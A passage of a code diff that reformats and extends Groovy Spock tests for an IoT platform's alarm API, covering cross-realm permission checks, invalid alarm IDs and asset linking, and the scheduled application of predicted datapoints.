+    def masterAlarm = adminResource.createAlarm(null, new Alarm("Master alarm", "Master content", Severity.MEDIUM, null, MASTER_REALM), null)
+
+    when:
+    buildingUserResource.removeAlarms(null, [masterAlarm.id])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "should reject creating alarms with linked assets from another realm"() {
-        given:
-        def buildingRealm = keycloakTestSetup.realmBuilding.name
+    and:
+    adminResource.getAlarm(null, masterAlarm.id) != null
 
-        when:
-        buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), [managerTestSetup.smartOfficeId])
+    when:
+    buildingUserResource.getAlarm(null, masterAlarm.id)
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    // Linking alarms without permissions
-    def "should not be able to link alarms without proper permissions"() {
-        when:
-        def alarm = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        regularUserResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm.id, managerTestSetup.smartOfficeId)])
+    when:
+    buildingUserResource.removeAlarm(null, masterAlarm.id)
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
+
+  // Delete alarms in a mixed-realm bulk request as non-super-user
+  def "should not bulk delete any alarms when one alarm belongs to another realm"() {
+    given:
+    def buildingRealm = keycloakTestSetup.realmBuilding.name
+    def buildingAlarm = buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), null)
+    def masterAlarm = adminResource.createAlarm(null, new Alarm("Master alarm", "Master content", Severity.MEDIUM, null, MASTER_REALM), null)
+
+    when:
+    buildingUserResource.removeAlarms(null, [buildingAlarm.id, masterAlarm.id])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    // Creating invalid alarm links
-    def "should not create invalid alarm links"() {
-        when:
-        def alarm = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.setAssetLinks(null, [])
+    and:
+    buildingUserResource.getAlarm(null, buildingAlarm.id) != null
+    adminResource.getAlarm(null, masterAlarm.id) != null
+  }
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+  // Delete empty or null alarms
+  def "should not delete null or empty alarms"() {
+    when:
+    adminResource.removeAlarm(null, 0)
 
-        when:
-        adminResource.setAssetLinks(null, [null])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when:
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(null, null, null)])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-
-        when:
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, null, null)])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when:
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, -1L, null)])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when:
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm.id, null)])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when:
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm.id, "")])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
     }
 
+    when:
+    adminResource.removeAlarms(null, [])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.removeAlarms(null, [null])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+  }
+
+  // Delete invalid alarms
+  def "should not delete alarms with invalid ID"() {
+    when:
+    adminResource.removeAlarm(null, -1L)
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.removeAlarms(null, [-1L, 0L, 1L])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+  }
+
+  // Delete non-exising alarms
+  def "should not delete non-existing alarms"() {
+    when:
+    adminResource.removeAlarm(null, 1L)
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+
+    when:
+    adminResource.removeAlarms(null, [1L, 2L, 3L])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+  }
+
+  // Delete one alarm as admin
+  def "should delete one alarm as admin"() {
+    when:
+    for (int i = 0; i < 2; i++) {
+      adminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, MASTER_REALM), null)
+    }
+    def delete = adminResource.getAlarms(null, MASTER_REALM, null, null, null)[0]
+    adminResource.removeAlarm(null, delete.id)
+
+    then: "returns some alarms but not the deleted alarm"
+    def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
+    alarms.find { it.id == delete.id } == null
+    alarms.length> 0
+  }
+
+  // Delete one alarm as an super user in other realm
+  def "should delete one alarm as new super user in other realm"() {
+    when:
+    for (int i = 0; i < 2; i++) {
+      superAdminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, keycloakTestSetup.realmBuilding.name), null)
+    }
+    def delete = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)[0]
+    superAdminResource.removeAlarm(null, delete.id)
+
+    then: "returns some alarms but not the deleted alarm"
+    def alarms = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)
+    alarms.find { it.id == delete.id } == null
+    alarms.length> 0
+  }
+
+  // Delete multiple alarms as admin
+  def "should delete multiple alarms as admin"() {
+    when:
+    for (int i = 0; i < 2; i++) {
+      adminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, MASTER_REALM), null)
+    }
+    def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
+    adminResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
+
+    then: "returns no alarms"
+    adminResource.getAlarms(null, MASTER_REALM, null, null, null).length == 0
+  }
+
+  // Delete multiple alarms as super user in other realm
+  def "should delete multiple alarms as super user in other realm"() {
+    when:
+    for (int i = 0; i < 2; i++) {
+      superAdminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, keycloakTestSetup.realmBuilding.name), null)
+    }
+    def alarms = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)
+    superAdminResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
+
+    then: "returns no alarms"
+    superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null).length == 0
+  }
+
+  // Get open alarms
+  def "should get open alarms"() {
+    when: "two open and one closed alarms are added"
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 3').setContent('content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    def openAlarms = adminResource.getAlarms(null, MASTER_REALM, Alarm.Status.OPEN, null, null)
+
+    then: "returns 2 open alarms"
+    openAlarms.size() == 2
+  }
+
+  // Linking alarms as admin
+  def "should be able to link alarms to assets as admin"() {
+    when: "two alarms are added"
+    def alarm1 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    def alarm2 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+
+    then: "both can be linked to an asset"
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm1.id, managerTestSetup.smartOfficeId)])
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm2.id, managerTestSetup.smartOfficeId)])
+
+    when: "the alarm asset links are retrieved"
+    def alarm1Links = adminResource.getAssetLinks(null, alarm1.id, MASTER_REALM)
+    def alarm2Links = adminResource.getAssetLinks(null, alarm2.id, MASTER_REALM)
+
+    then: "the alarm asset links match"
+    alarm1Links.size() == 1
+    alarm1Links.get(0).id.alarmId == alarm1.id
+    alarm1Links.get(0).id.assetId == managerTestSetup.smartOfficeId
+    alarm1Links.get(0).id.realm == MASTER_REALM
+    alarm2Links.size() == 1
+    alarm2Links.get(0).id.alarmId == alarm2.id
+    alarm2Links.get(0).id.assetId == managerTestSetup.smartOfficeId
+    alarm2Links.get(0).id.realm == MASTER_REALM
+
+    when: "more alarm asset links are added"
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm1.id, managerTestSetup.lobbyId)])
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm2.id, managerTestSetup.lobbyId)])
+    alarm1Links = adminResource.getAssetLinks(null, alarm1.id, MASTER_REALM)
+    alarm2Links = adminResource.getAssetLinks(null, alarm2.id, MASTER_REALM)
+
+    then: "these alarm asset links also match"
+    alarm1Links.size() == 2
+    alarm1Links.get(0).id.alarmId == alarm1.id
+    alarm1Links.get(0).id.assetId == managerTestSetup.lobbyId
+    alarm1Links.get(0).id.realm == MASTER_REALM
+    alarm1Links.get(1).id.alarmId == alarm1.id
+    alarm1Links.get(1).id.assetId == managerTestSetup.smartOfficeId
+    alarm1Links.get(1).id.realm == MASTER_REALM
+    alarm2Links.size() == 2
+    alarm2Links.get(0).id.alarmId == alarm2.id
+    alarm2Links.get(0).id.assetId == managerTestSetup.lobbyId
+    alarm2Links.get(0).id.realm == MASTER_REALM
+    alarm2Links.get(1).id.alarmId == alarm2.id
+    alarm2Links.get(1).id.assetId == managerTestSetup.smartOfficeId
+    alarm2Links.get(1).id.realm == MASTER_REALM
+  }
+
+  def "should reject asset links for multiple alarms in one request"() {
+    given:
+    def alarm1 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    def alarm2 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+
+    when:
+    adminResource.setAssetLinks(null, [
+      new AlarmAssetLink(MASTER_REALM, alarm1.id, managerTestSetup.smartOfficeId),
+      new AlarmAssetLink(MASTER_REALM, alarm2.id, managerTestSetup.smartOfficeId)
+    ])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    and:
+    adminResource.getAssetLinks(null, alarm1.id, MASTER_REALM).isEmpty()
+    adminResource.getAssetLinks(null, alarm2.id, MASTER_REALM).isEmpty()
+  }
+
+  // Linking alarms across realms
+  def "should reject asset links for multiple realms in one request"() {
+    given:
+    def buildingRealm = keycloakTestSetup.realmBuilding.name
+    def alarm = buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), null)
+    def links = [
+      new AlarmAssetLink(buildingRealm, alarm.id, managerTestSetup.apartment1Id),
+      new AlarmAssetLink(MASTER_REALM, alarm.id, managerTestSetup.smartOfficeId)
+    ]
+
+    when:
+    buildingUserResource.setAssetLinks(null, links)
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    and:
+    buildingUserResource.getAssetLinks(null, alarm.id, buildingRealm).isEmpty()
+    superAdminResource.getAssetLinks(null, alarm.id, MASTER_REALM).isEmpty()
+  }
+
+  def "should reject asset links pointing to assets from another realm"() {
+    given:
+    def buildingRealm = keycloakTestSetup.realmBuilding.name
+    def alarm = buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), null)
+
+    when:
+    buildingUserResource.setAssetLinks(null, [new AlarmAssetLink(buildingRealm, alarm.id, managerTestSetup.smartOfficeId)])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    and:
+    buildingUserResource.getAssetLinks(null, alarm.id, buildingRealm).isEmpty()
+  }
+
+  def "should reject asset links pointing to alarms from another realm"() {
+    given:
+    def buildingRealm = keycloakTestSetup.realmBuilding.name
+    def masterAlarm = adminResource.createAlarm(null, new Alarm("Master alarm", "Master content", Severity.MEDIUM, null, MASTER_REALM), null)
+
+    when:
+    buildingUserResource.setAssetLinks(null, [new AlarmAssetLink(buildingRealm, masterAlarm.id, managerTestSetup.apartment1Id)])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    and:
+    buildingUserResource.getAssetLinks(null, masterAlarm.id, buildingRealm).isEmpty()
+  }
+
+  def "should reject creating alarms with linked assets from another realm"() {
+    given:
+    def buildingRealm = keycloakTestSetup.realmBuilding.name
+
+    when:
+    buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), [managerTestSetup.smartOfficeId])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+  }
+
+  // Linking alarms without permissions
+  def "should not be able to link alarms without proper permissions"() {
+    when:
+    def alarm = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    regularUserResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm.id, managerTestSetup.smartOfficeId)])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
+
+  // Creating invalid alarm links
+  def "should not create invalid alarm links"() {
+    when:
+    def alarm = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.setAssetLinks(null, [])
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.setAssetLinks(null, [null])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(null, null, null)])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+
+    when:
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, null, null)])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, -1L, null)])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm.id, null)])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when:
+    adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm.id, "")])
+
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/ApplyPredictedDataPointsServiceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/ApplyPredictedDataPointsServiceTest.groovy
@@ -47,742 +47,748 @@ import static org.openremote.model.value.MetaItemType.HAS_PREDICTED_DATA_POINTS
 
 class ApplyPredictedDataPointsServiceTest extends Specification implements ManagerContainerTrait {
 
-    // Delay and future of the last schedule as a single value, so a delay can never be paired with a stale future
-    volatile Map<String, ?> scheduled
-    ApplyPredictedDataPointsService mockedApplyService
-    ScheduledExecutorService originalExecutor
+  // Delay and future of the last schedule as a single value, so a delay can never be paired with a stale future
+  volatile Map<String, ?> scheduled
+  ApplyPredictedDataPointsService mockedApplyService
+  ScheduledExecutorService originalExecutor
 
-    def cleanup() {
-        if (mockedApplyService != null) {
-            synchronized (mockedApplyService.scheduleLock) {
-                mockedApplyService.scheduledFuture?.cancel(true)
-                mockedApplyService.scheduledFuture = null
-                mockedApplyService.scheduledEntries.clear()
-                mockedApplyService.scheduleQueue.clear()
-                mockedApplyService.scheduledExecutorService = originalExecutor
-            }
-            mockedApplyService = null
-        }
+  def cleanup() {
+    if (mockedApplyService != null) {
+      synchronized (mockedApplyService.scheduleLock) {
+        mockedApplyService.scheduledFuture?.cancel(true)
+        mockedApplyService.scheduledFuture = null
+        mockedApplyService.scheduledEntries.clear()
+        mockedApplyService.scheduleQueue.clear()
+        mockedApplyService.scheduledExecutorService = originalExecutor
+      }
+      mockedApplyService = null
     }
+  }
 
-    def "Applies predicted datapoints when timestamps match"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+  def "Applies predicted datapoints when timestamps match"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        and: "the attribute is created tagged for predicted datapoint application"
-        def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue1")
+    and: "the attribute is created tagged for predicted datapoint application"
+    def attributeRef = createTestAttributeWithApplyMeta(assetStorageService, managerTestSetup.thingId, "predictedValue1")
 
-        when: "predicted datapoints are added in the future"
-        def predictedDatapoints = [
-            new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
-            new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
-        ]
-        assetPredictedDatapointService.updateValues(
+    when: "predicted datapoints are added in the future"
+    def predictedDatapoints = [
+      new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(1), 10d),
+      new ValueDatapoint<>(now + TimeUnit.MINUTES.toMillis(2), 20d)
+    ]
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             predictedDatapoints
-        )
+            )
 
-        and: "time advances to the first datapoint"
-        awaitScheduled(applyService, attributeRef, conditions)
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        scheduled.future.get()
-        then: "the first predicted value should be applied"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 10d
-            assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(1)
-        }
-
-        when: "time advances to the next datapoint"
-        awaitScheduled(applyService, attributeRef, conditions)
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-        scheduled.future.get()
-
-        then: "the second predicted value should be applied"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 20d
-            assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(2)
-        }
+    and: "time advances to the first datapoint"
+    awaitScheduled(applyService, attributeRef, conditions)
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    scheduled.future.get()
+    then: "the first predicted value should be applied"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 10d
+      assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(1)
     }
 
-    def "Applies the last past datapoint when current value is older"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+    when: "time advances to the next datapoint"
+    awaitScheduled(applyService, attributeRef, conditions)
+    advancePseudoClock(1, TimeUnit.MINUTES, container)
+    scheduled.future.get()
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+    then: "the second predicted value should be applied"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 20d
+      assert attribute.getTimestamp().orElse(0L) == now + TimeUnit.MINUTES.toMillis(2)
+    }
+  }
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+  def "Applies the last past datapoint when current value is older"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the attribute has a value timestamp at the origin of test"
-        def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue2")
-        assetProcessingService.sendAttributeEvent(
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
+
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
+
+    and: "the attribute has a value timestamp at the origin of test"
+    def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue2")
+    assetProcessingService.sendAttributeEvent(
             new AttributeEvent(attributeRef, 1d, now)
-        )
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 1d
-            assert attribute.getTimestamp().orElse(0L) == now
-        }
+            )
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 1d
+      assert attribute.getTimestamp().orElse(0L) == now
+    }
 
-        and: "the attribute is tagged for predicted datapoint application"
-        enablePredictedApplyMeta(assetStorageService, attributeRef.getId(), attributeRef.getName())
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(HAS_PREDICTED_DATA_POINTS)
-            assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(APPLY_PREDICTED_DATA_POINTS)
-        }
+    and: "the attribute is tagged for predicted datapoint application"
+    enablePredictedApplyMeta(assetStorageService, attributeRef.getId(), attributeRef.getName())
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(HAS_PREDICTED_DATA_POINTS)
+      assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(APPLY_PREDICTED_DATA_POINTS)
+    }
 
-        and: "the clock is moved forward"
-        advancePseudoClock(3, TimeUnit.MINUTES)
-        now = getClockTimeOf(container)
+    and: "the clock is moved forward"
+    advancePseudoClock(3, TimeUnit.MINUTES)
+    now = getClockTimeOf(container)
 
-        when: "predicted datapoints are added in the past"
-        assetPredictedDatapointService.updateValues(
+    when: "predicted datapoints are added in the past"
+    assetPredictedDatapointService.updateValues(
             attributeRef.getId(),
             attributeRef.getName(),
             [
-                new ValueDatapoint<>(now - TimeUnit.MINUTES.toMillis(1), 5d),
-                new ValueDatapoint<>(now - TimeUnit.SECONDS.toMillis(10), 7d)
+              new ValueDatapoint<>(now - TimeUnit.MINUTES.toMillis(1), 5d),
+              new ValueDatapoint<>(now - TimeUnit.SECONDS.toMillis(10), 7d)
             ]
-        )
+            )
 
-        then: "the last predicted value should be applied immediately"
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 7d
-            assert attribute.getTimestamp().orElse(0L) == now - TimeUnit.SECONDS.toMillis(10)
-        }
+    then: "the last predicted value should be applied immediately"
+    conditions.eventually {
+      def asset = assetStorageService.find(attributeRef.getId(), true)
+      def attribute = asset.getAttribute(attributeRef.getName()).get()
+      assert attribute.getValue(Double.class).orElse(null) == 7d
+      assert attribute.getTimestamp().orElse(0L) == now - TimeUnit.SECONDS.toMillis(10)
     }
+  }
 
-    def "Skips past datapoints when current value is newer"() {
-        given: "a running container and target attribute with required meta"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def applyService = container.getService(ApplyPredictedDataPointsService.class)
+  def "Skips past datapoints when current value is newer"() {
+    given: "a running container and target attribute with required meta"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def applyService = container.getService(ApplyPredictedDataPointsService.class)
 
-        and: "the clock is stopped for deterministic scheduling"
-        stopPseudoClock()
-        def now = getClockTimeOf(container)
+    and: "the clock is stopped for deterministic scheduling"
+    stopPseudoClock()
+    def now = getClockTimeOf(container)
 
-        and: "the scheduled executor is mocked to allow manual triggering"
-        setupScheduler(applyService)
+    and: "the scheduled executor is mocked to allow manual triggering"
+    setupScheduler(applyService)
 
-        and: "the attribute has a newer value timestamp"
-        def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue3")
-        assetProcessingService.sendAttributeEvent(
+    and: "the attribute has a newer value timestamp"
+    def attributeRef = createTestAttribute(assetStorageService, managerTestSetup.thingId, "predictedValue3")
+    assetProcessingService.sendAttributeEvent(
             new AttributeEvent(attributeRef, 99d, now)
-        )
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            def attribute = asset.getAttribute(attributeRef.getName()).get()
-            assert attribute.getValue(Double.class).orElse(null) == 99d
-            assert attribute.getTimestamp().orElse(0L) == now
-        }
-
-        and: "the attribute is tagged for predicted datapoint application"
-        enablePredictedApplyMeta(assetStorageService, attributeRef.getId(), attributeRef.getName())
-        conditions.eventually {
-            def asset = assetStorageService.find(attributeRef.getId(), true)
-            assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(HAS_PREDICTED_DATA_POINTS)
-            assert asset.getAttribute(attributeRef.getName()).get().getMeta().has(APPLY_PREDICTED_DATA_POINTS)
-        }
-
